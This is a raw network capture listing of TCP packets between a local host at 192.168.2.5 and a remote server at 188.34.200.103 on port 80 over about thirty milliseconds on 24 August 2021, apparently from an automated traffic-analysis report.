Aug 24, 2021 08:49:23.961548090 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.961571932 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.961616993 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.961672068 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.961673975 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.961752892 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.961812019 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.961827993 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.961878061 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.961910963 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.961944103 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.961999893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962040901 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962117910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962138891 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962155104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962167978 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962229967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962277889 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962295055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962333918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962378979 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962405920 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962469101 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962511063 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962516069 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962544918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962599039 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962615967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962654114 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962723017 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962728977 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962739944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962779045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962837934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962841034 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962861061 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962884903 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962888956 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962939024 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962946892 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962954998 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.962963104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962985992 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.962996960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963022947 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963047028 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963047028 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963068962 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963088036 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963109970 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963109970 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963187933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963188887 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963212013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963263988 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963270903 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963279009 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963285923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963304043 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963306904 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963329077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963337898 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963357925 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963382959 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963385105 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963407993 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963428974 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963460922 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963485956 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963507891 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963515043 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963536978 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963562965 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963568926 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963577986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963603020 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963641882 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963665009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963687897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963798046 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963798046 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963808060 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963865995 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963881969 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963912964 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963936090 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963957071 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.963965893 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.963979006 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964001894 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964004993 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964020967 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964040041 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964056015 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964066029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964090109 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964091063 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964112043 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964121103 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964133978 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964157104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964162111 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964178085 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964190960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964200974 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964222908 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964230061 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964245081 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964266062 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964268923 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964284897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964293957 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964306116 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964329004 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964334011 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964359045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964375019 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964375973 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964396000 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964404106 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964418888 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964431047 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964449883 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964468956 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964478016 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964488983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964499950 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964507103 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964531898 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964538097 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964553118 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964571953 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964576006 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964591980 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964607000 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964612961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964632988 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964642048 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964653969 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964674950 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964684963 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964696884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964713097 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964719057 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964737892 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964739084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964759111 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964777946 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964777946 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964797974 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964818954 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964838982 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964860916 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964898109 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964899063 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964909077 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964911938 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964926958 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964939117 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964962006 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964963913 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.964983940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.964987040 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965006113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965010881 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965030909 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965040922 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965053082 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965065956 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965091944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965095043 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965097904 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965121031 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965145111 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965167046 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965183020 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965193033 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965217113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965219021 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965238094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965248108 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965261936 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965281963 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965284109 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965308905 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965317011 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965332031 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965353966 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965357065 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965379953 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965404987 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965425968 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965428114 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965450048 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965451002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965473890 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965497017 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965504885 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965519905 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965528011 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965543985 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965564013 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965569973 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965590000 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965595961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965619087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965641022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965642929 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965662003 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965677023 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965683937 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965707064 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965711117 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965728998 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965749979 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965755939 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965775967 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965779066 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965801001 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965822935 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965823889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965847969 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965863943 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965873003 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965888977 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965897083 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965918064 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965939999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965959072 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965964079 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965965033 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.965987921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.965993881 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.966022968 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.976316929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.976358891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.976490974 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.987797976 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.987891912 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.987932920 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.987967968 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988004923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988025904 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988035917 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988051891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988075018 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988080025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988105059 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988112926 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988128901 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988153934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988174915 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988178015 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988199949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988208055 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988224030 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988236904 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988249063 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988276005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988281012 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988301039 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988312006 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988323927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988344908 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988348007 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988367081 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988372087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988395929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988419056 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988441944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988445044 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988454103 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988470078 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988495111 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988507032 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988517046 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988535881 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988559961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988585949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988610983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988632917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988651037 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988656998 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988681078 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988702059 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988704920 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988713980 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988718987 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988723040 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988727093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988729000 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988749981 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988749981 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988776922 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988800049 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988801003 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988825083 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988847971 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988853931 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988863945 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988872051 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988894939 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988909006 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988918066 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988940954 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988949060 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988966942 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.988975048 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.988991022 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989013910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989016056 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989037037 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989053965 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989059925 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989084005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989097118 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989108086 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989131927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989131927 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989159107 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989160061 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989182949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989195108 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989204884 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989229918 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989253044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989260912 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989275932 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989291906 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989299059 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:23.989299059 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:23.989321947 CEST	80	49718	188.34.200.103	192.168.2.5
